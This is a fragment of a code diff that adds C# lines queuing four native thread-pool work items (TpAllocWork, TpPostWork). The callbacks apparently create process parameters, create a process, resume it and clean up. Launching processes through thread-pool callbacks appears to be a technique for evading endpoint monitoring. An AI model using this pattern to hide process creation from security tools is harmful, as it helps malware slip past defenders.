     1197 + IntPtr Work1 = IntPtr.Zero;
     1198 + TpAllocWork( out Work1, WorkCallback_CoreCreateParms, ref PtrZero, IntPtr.Zero );
     1199 + TpPostWork( Work1, TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_NORMAL );
     1200 + TpReleaseWork( Work1 );
     1201 + System.Threading.Thread.Sleep(500);
     1202 + IntPtr Work2 = IntPtr.Zero;
     1203 + TpAllocWork( out Work2, WorkCallback_CoreCreateProcess, ref PtrZero, IntPtr.Zero );
     1204 + TpPostWork( Work2, TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_NORMAL );
     1205 + TpReleaseWork( Work2 );
     1206 + System.Threading.Thread.Sleep(500);
     1207 + IntPtr Work3 = IntPtr.Zero;
     1208 + TpAllocWork( out Work3, WorkCallback_CoreResume, ref PtrZero, IntPtr.Zero );
     1209 + TpPostWork( Work3, TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_NORMAL );
     1210 + TpReleaseWork( Work3 );
     1211 + System.Threading.Thread.Sleep(500);
     1212 + IntPtr Work4 = IntPtr.Zero;
     1213 + TpAllocWork( out Work4, WorkCallback_CoreDestroyParms, ref PtrZero, IntPtr.Zero );
     1214 + TpPostWork( Work4, TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_NORMAL );
     1215 + TpReleaseWork( Work4 );
     1216 +
     1217 + }
     1218 + }
     1219 +}
     1220 + 